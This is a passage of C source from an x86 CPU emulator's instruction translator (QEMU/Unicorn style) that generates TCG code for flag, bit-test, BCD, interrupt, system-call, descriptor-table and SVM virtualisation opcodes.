tcg_ctx->cpu_cc_src, 0x02); gen_op_mov_reg_v(s, MO_8, R_AH, s->T0); break; case 0xf5: /* cmc */ gen_compute_eflags(s); tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, CC_C); break; case 0xf8: /* clc */ gen_compute_eflags(s); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, ~CC_C); break; case 0xf9: /* stc */ gen_compute_eflags(s); tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, CC_C); break; case 0xfc: /* cld */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, 1); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, df)); break; case 0xfd: /* std */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, -1); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, df)); break; /************************/ /* bit operations */ case 0x1ba: /* bt/bts/btr/btc Gv, im */ ot = dflag; modrm = x86_ldub_code(env, s); op = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod != 3) { s->rip_offset = 1; gen_lea_modrm(env, s, modrm); if (!(s->prefix & PREFIX_LOCK)) { gen_op_ld_v(s, ot, s->T0, s->A0); } } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } /* load shift */ val = x86_ldub_code(env, s); tcg_gen_movi_tl(tcg_ctx, s->T1, val); if (op < 4) goto unknown_op; op -= 4; goto bt_op; case 0x1a3: /* bt Gv, Ev */ op = 0; goto do_btx; case 0x1ab: /* bts */ op = 1; goto do_btx; case 0x1b3: /* btr */ op = 2; goto do_btx; case 0x1bb: /* btc */ op = 3; do_btx: ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); gen_op_mov_v_reg(s, MO_32, s->T1, reg); if (mod != 3) { AddressParts a = gen_lea_modrm_0(env, s, modrm); /* specific case: we need to add a displacement */ gen_exts(tcg_ctx, ot, s->T1); tcg_gen_sari_tl(tcg_ctx, s->tmp0, s->T1, 3 + ot); tcg_gen_shli_tl(tcg_ctx, s->tmp0, s->tmp0, ot); tcg_gen_add_tl(tcg_ctx, s->A0, gen_lea_modrm_1(s, a), s->tmp0); gen_lea_v_seg(s, s->aflag, s->A0, a.def_seg, s->override); if (!(s->prefix & PREFIX_LOCK)) { gen_op_ld_v(s, ot, s->T0, s->A0); } } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } bt_op: tcg_gen_andi_tl(tcg_ctx, s->T1, s->T1, (1 << (3 + ot)) - 1); tcg_gen_movi_tl(tcg_ctx, s->tmp0, 1); tcg_gen_shl_tl(tcg_ctx, s->tmp0, s->tmp0, s->T1); if (s->prefix & PREFIX_LOCK) { switch (op) { case 0: /* bt */ /* Needs no atomic ops; we surpressed the normal memory load for LOCK above so do it now. */ gen_op_ld_v(s, ot, s->T0, s->A0); break; case 1: /* bts */ tcg_gen_atomic_fetch_or_tl(tcg_ctx, s->T0, s->A0, s->tmp0, s->mem_index, ot | MO_LE); break; case 2: /* btr */ tcg_gen_not_tl(tcg_ctx, s->tmp0, s->tmp0); tcg_gen_atomic_fetch_and_tl(tcg_ctx, s->T0, s->A0, s->tmp0, s->mem_index, ot | MO_LE); break; default: case 3: /* btc */ tcg_gen_atomic_fetch_xor_tl(tcg_ctx, s->T0, s->A0, s->tmp0, s->mem_index, ot | MO_LE); break; } tcg_gen_shr_tl(tcg_ctx, s->tmp4, s->T0, s->T1); } else { tcg_gen_shr_tl(tcg_ctx, s->tmp4, s->T0, s->T1); switch (op) { case 0: /* bt */ /* Data already loaded; nothing to do. */ break; case 1: /* bts */ tcg_gen_or_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; case 2: /* btr */ tcg_gen_andc_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; default: case 3: /* btc */ tcg_gen_xor_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; } if (op != 0) { if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, rm, s->T0); } } } /* Delay all CC updates until after the store above. Note that C is the result of the test, Z is unchanged, and the others are all undefined. */ switch (s->cc_op) { case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: case CC_OP_ADCB: case CC_OP_ADCW: case CC_OP_ADCL: case CC_OP_ADCQ: case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: case CC_OP_SBBB: case CC_OP_SBBW: case CC_OP_SBBL: case CC_OP_SBBQ: case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: /* Z was going to be computed from the non-zero status of CC_DST. We can get that same Z value (and the new C value) by leaving CC_DST alone, setting CC_SRC, and using a CC_OP_SAR of the same width. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp4); set_cc_op(s, ((s->cc_op - CC_OP_MULB) & 3) + CC_OP_SARB); break; default: /* Otherwise, generate EFLAGS and replace the C bit. */ gen_compute_eflags(s); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, s->tmp4, ctz32(CC_C), 1); break; } break; case 0x1bc: /* bsf / tzcnt */ case 0x1bd: /* bsr / lzcnt */ ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_extu(tcg_ctx, ot, s->T0); /* Note that lzcnt and tzcnt are in different extensions. */ if ((prefixes & PREFIX_REPZ) && (b & 1 ? s->cpuid_ext3_features & CPUID_EXT3_ABM : s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1)) { int size = 8 << ot; /* For lzcnt/tzcnt, C bit is defined related to the input. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); if (b & 1) { /* For lzcnt, reduce the target_ulong result by the number of zeros that we expect to find at the top. */ tcg_gen_clzi_tl(tcg_ctx, s->T0, s->T0, TARGET_LONG_BITS); tcg_gen_subi_tl(tcg_ctx, s->T0, s->T0, TARGET_LONG_BITS - size); } else { /* For tzcnt, a zero input must return the operand size. */ tcg_gen_ctzi_tl(tcg_ctx, s->T0, s->T0, size); } /* For lzcnt/tzcnt, Z bit is defined related to the result. */ gen_op_update1_cc(s); set_cc_op(s, CC_OP_BMILGB + ot); } else { /* For bsr/bsf, only the Z bit is defined and it is related to the input and not the result. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); set_cc_op(s, CC_OP_LOGICB + ot); /* ??? The manual says that the output is undefined when the input is zero, but real hardware leaves it unchanged, and real programs appear to depend on that. Accomplish this by passing the output as the value to return upon zero. */ if (b & 1) { /* For bsr, return the bit index of the first 1 bit, not the count of leading zeros. */ tcg_gen_xori_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[reg], TARGET_LONG_BITS - 1); tcg_gen_clz_tl(tcg_ctx, s->T0, s->T0, s->T1); tcg_gen_xori_tl(tcg_ctx, s->T0, s->T0, TARGET_LONG_BITS - 1); } else { tcg_gen_ctz_tl(tcg_ctx, s->T0, s->T0, tcg_ctx->cpu_regs[reg]); } } gen_op_mov_reg_v(s, ot, reg, s->T0); break; /************************/ /* bcd */ case 0x27: /* daa */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_daa(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x2f: /* das */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_das(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x37: /* aaa */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_aaa(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x3f: /* aas */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_aas(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0xd4: /* aam */ if (CODE64(s)) goto illegal_op; val = x86_ldub_code(env, s); if (val == 0) { gen_exception(s, EXCP00_DIVZ, pc_start - s->cs_base); } else { gen_helper_aam(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, val)); set_cc_op(s, CC_OP_LOGICB); } break; case 0xd5: /* aad */ if (CODE64(s)) goto illegal_op; val = x86_ldub_code(env, s); gen_helper_aad(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, val)); set_cc_op(s, CC_OP_LOGICB); break; /************************/ /* misc */ case 0x90: /* nop */ /* XXX: correct lock test for all insn */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } /* If REX_B is set, then this is xchg eax, r8d, not a nop. */ if (REX_B(s)) { goto do_xchg_reg_eax; } if (prefixes & PREFIX_REPZ) { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_pause(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); s->base.is_jmp = DISAS_NORETURN; } break; case 0x9b: /* fwait */ if ((s->flags & (HF_MP_MASK | HF_TS_MASK)) == (HF_MP_MASK | HF_TS_MASK)) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); } else { gen_helper_fwait(tcg_ctx, tcg_ctx->cpu_env); } break; case 0xcc: /* int3 */ gen_interrupt(s, EXCP03_INT3, pc_start - s->cs_base, s->pc - s->cs_base); break; case 0xcd: /* int N */ val = x86_ldub_code(env, s); if (s->vm86 && s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_interrupt(s, val, pc_start - s->cs_base, s->pc - s->cs_base); } break; case 0xce: /* into */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_into(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); break; #ifdef WANT_ICEBP case 0xf1: /* icebp (undocumented, exits to external debugger) */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_ICEBP); gen_debug(s, pc_start - s->cs_base); break; #endif case 0xfa: /* cli */ if (!s->vm86) { if (s->cpl <= s->iopl) { gen_helper_cli(tcg_ctx, tcg_ctx->cpu_env); } else { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } } else { if (s->iopl == 3) { gen_helper_cli(tcg_ctx, tcg_ctx->cpu_env); } else { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } } break; case 0xfb: /* sti */ if (s->vm86 ? s->iopl == 3 : s->cpl <= s->iopl) { gen_helper_sti(tcg_ctx, tcg_ctx->cpu_env); /* interruptions are enabled only the first insn after sti */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob_inhibit_irq(s, true); } else { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } break; case 0x62: /* bound */ if (CODE64(s)) goto illegal_op; ot = dflag; modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; gen_op_mov_v_reg(s, ot, s->T0, reg); gen_lea_modrm(env, s, modrm); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); if (ot == MO_16) { gen_helper_boundw(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp2_i32); } else { gen_helper_boundl(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp2_i32); } break; case 0x1c8: /* bswap reg */ case 0x1c9: /* bswap reg */ case 0x1ca: /* bswap reg */ case 0x1cb: /* bswap reg */ case 0x1cc: /* bswap reg */ case 0x1cd: /* bswap reg */ case 0x1ce: /* bswap reg */ case 0x1cf: /* bswap reg */ reg = (b & 7) | REX_B(s); #ifdef TARGET_X86_64 if (dflag == MO_64) { gen_op_mov_v_reg(s, MO_64, s->T0, reg); tcg_gen_bswap64_i64(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_64, reg, s->T0); } else #endif if (dflag == MO_32) { gen_op_mov_v_reg(s, MO_32, s->T0, reg); tcg_gen_ext32u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_bswap32_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_32, reg, s->T0); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, 0); gen_op_mov_reg_v(s, MO_16, reg, s->T0); } break; case 0xd6: /* salc */ if (CODE64(s)) goto illegal_op; gen_compute_eflags_c(s, s->T0); tcg_gen_neg_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_8, R_EAX, s->T0); break; case 0xe0: /* loopnz */ case 0xe1: /* loopz */ case 0xe2: /* loop */ case 0xe3: /* jecxz */ { TCGLabel *l1, *l2, *l3; tval = (int8_t)insn_get(env, s, MO_8); next_eip = s->pc - s->cs_base; tval += next_eip; if (dflag == MO_16) { tval &= 0xffff; } l1 = gen_new_label(tcg_ctx); l2 = gen_new_label(tcg_ctx); l3 = gen_new_label(tcg_ctx); b &= 3; switch(b) { case 0: /* loopnz */ case 1: /* loopz */ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); gen_op_jz_ecx(s, s->aflag, l3); gen_jcc1(s, (JCC_Z << 1) | (b ^ 1), l1); break; case 2: /* loop */ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); gen_op_jnz_ecx(s, s->aflag, l1); break; default: case 3: /* jcxz */ gen_op_jz_ecx(s, s->aflag, l1); break; } gen_set_label(tcg_ctx, l3); gen_jmp_im(s, next_eip); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); gen_jmp_im(s, tval); gen_set_label(tcg_ctx, l2); gen_eob(s); } break; case 0x130: /* wrmsr */ case 0x132: /* rdmsr */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (b & 2) { gen_helper_rdmsr(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_wrmsr(tcg_ctx, tcg_ctx->cpu_env); } } break; case 0x131: /* rdtsc */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdtsc(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0x133: /* rdpmc */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_rdpmc(tcg_ctx, tcg_ctx->cpu_env); break; case 0x134: /* sysenter */ /* For Intel SYSENTER is valid on 64-bit */ if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) goto illegal_op; if (!s->pe) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { TCGv_i32 addend = tcg_const_i32(tcg_ctx, s->pc - pc_start); gen_helper_sysenter(tcg_ctx, tcg_ctx->cpu_env, addend); gen_eob(s); tcg_temp_free_i32(tcg_ctx, addend); } break; case 0x135: /* sysexit */ /* For Intel SYSEXIT is valid on 64-bit */ if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) goto illegal_op; if (!s->pe) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_helper_sysexit(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); gen_eob(s); } break; #ifdef TARGET_X86_64 case 0x105: /* syscall */ /* XXX: is it usable in real mode ? */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_syscall(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); /* TF handling for the syscall insn is different. The TF bit is checked after the syscall insn completes. This allows #DB to not be generated after one has entered CPL0 if TF is set in FMASK. */ gen_eob_worker(s, false, true); break; case 0x107: /* sysret */ if (!s->pe) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_helper_sysret(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); /* condition codes are modified only in long mode */ if (s->lma) { set_cc_op(s, CC_OP_EFLAGS); } /* TF handling for the sysret insn is different. The TF bit is checked after the sysret insn completes. This allows #DB to be generated "as if" the syscall insn in userspace has just completed. */ gen_eob_worker(s, false, true); } break; #endif case 0x1a2: /* cpuid */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_cpuid(tcg_ctx, tcg_ctx->cpu_env); break; case 0xf4: /* hlt */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_hlt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); s->base.is_jmp = DISAS_NORETURN; } break; case 0x100: modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; op = (modrm >> 3) & 7; switch(op) { case 0: /* sldt */ if (!s->pe || s->vm86) goto illegal_op; gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_READ); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, ldt.selector)); ot = mod == 3 ? dflag : MO_16; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 2: /* lldt */ if (!s->pe || s->vm86) goto illegal_op; if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_WRITE); gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_lldt(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); } break; case 1: /* str */ if (!s->pe || s->vm86) goto illegal_op; gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_READ); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, tr.selector)); ot = mod == 3 ? dflag : MO_16; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 3: /* ltr */ if (!s->pe || s->vm86) goto illegal_op; if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_WRITE); gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_ltr(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); } break; case 4: /* verr */ case 5: /* verw */ if (!s->pe || s->vm86) goto illegal_op; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); gen_update_cc_op(s); if (op == 4) { gen_helper_verr(tcg_ctx, tcg_ctx->cpu_env, s->T0); } else { gen_helper_verw(tcg_ctx, tcg_ctx->cpu_env, s->T0); } set_cc_op(s, CC_OP_EFLAGS); break; default: goto unknown_op; } break; case 0x101: modrm = x86_ldub_code(env, s); switch (modrm) { CASE_MODRM_MEM_OP(0): /* sgdt */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_GDTR_READ); gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.limit)); gen_op_st_v(s, MO_16, s->T0, s->A0); gen_add_A0_im(s, 2); tcg_gen_ld_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.base)); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } gen_op_st_v(s, CODE64(s) + MO_32, s->T0, s->A0); break; case 0xc8: /* monitor */ if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || s->cpl != 0) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); tcg_gen_mov_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EAX]); gen_extu(tcg_ctx, s->aflag, s->A0); gen_add_A0_ds_seg(s); gen_helper_monitor(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; case 0xc9: /* mwait */ if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || s->cpl != 0) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_mwait(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); gen_eob(s); break; case 0xca: /* clac */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || s->cpl != 0) { goto illegal_op; } gen_helper_clac(tcg_ctx, tcg_ctx->cpu_env); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xcb: /* stac */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || s->cpl != 0) { goto illegal_op; } gen_helper_stac(tcg_ctx, tcg_ctx->cpu_env); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; CASE_MODRM_MEM_OP(1): /* sidt */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_IDTR_READ); gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.limit)); gen_op_st_v(s, MO_16, s->T0, s->A0); gen_add_A0_im(s, 2); tcg_gen_ld_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.base)); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } gen_op_st_v(s, CODE64(s) + MO_32, s->T0, s->A0); break; case 0xd0: /* xgetbv */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (s->prefix & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_xgetbv(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s->tmp2_i32); tcg_gen_extr_i64_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->tmp1_i64); break; case 0xd1: /* xsetbv */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (s->prefix & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_xsetbv(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->tmp1_i64); /* End TB because translation flags may change. */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xd8: /* VMRUN */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmrun(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1), tcg_const_i32(tcg_ctx, s->pc - pc_start)); tcg_gen_exit_tb(tcg_ctx, NULL, 0); s->base.is_jmp = DISAS_NORETURN; break; case 0xd9: /* VMMCALL */ if (!(s->flags & HF_SVME_MASK)) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmmcall(tcg_ctx, tcg_ctx->cpu_env); break; case 0xda: /* VMLOAD */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmload(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); break; case 0xdb: /* VMSAVE */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmsave(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); break; case 0xdc: /* STGI */ if ((!(s->flags & HF_SVME_MASK) && !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_helper_stgi(tcg_ctx, tcg_ctx->cpu_env); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xdd: /* CLGI */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_clgi(tcg_ctx, tcg_ctx->cpu_env); break; case 0xde: /* SKINIT */ if ((!(s->flags & HF_SVME_MASK) && !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || !s->pe) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_skinit(tcg_ctx, tcg_ctx->cpu_env); break; case 0xdf: /* INVLPGA */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_invlpga(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); break; CASE_MODRM_MEM_OP(2): /* lgdt */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_svm_check_intercept(s, pc_start, SVM_EXIT_GDTR_WRITE); gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_16, s->T1, s->A0); gen_add_A0_im(s, 2); gen_op_ld_v(s, CODE64(s) + MO_32, s->T0, s->A0); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.base)); tcg_gen_st32_tl(tcg_ctx, s->T1, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.limit)); break; CASE_MODRM_MEM_OP(3): /* lidt */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_svm_check_intercept(s, pc_start, SVM_EXIT_IDTR_WRITE); gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_16, s->T1, s->A0); gen_add_A0_im(s, 2); gen_op_ld_v(s, CODE64(s) + MO_32, s->T0, s->A0); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.base)); tcg_gen_st32_tl(tcg_ctx, s->T1, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.limit)); break; CASE_MODRM_OP(4): /* smsw */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_CR0); tcg_gen_ld_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, cr[0])); if (CODE64(s)) { mod = (modrm >> 6) & 3; ot = (mod != 3 ? MO_16 : s->dflag); } else { ot = MO_16; } gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 0xee: /* rdpkru */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_rdpkru(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s->tmp2_i32); tcg_gen_extr_i64_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->tmp1_i64); break; case 0xef: /* wrpkru */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, 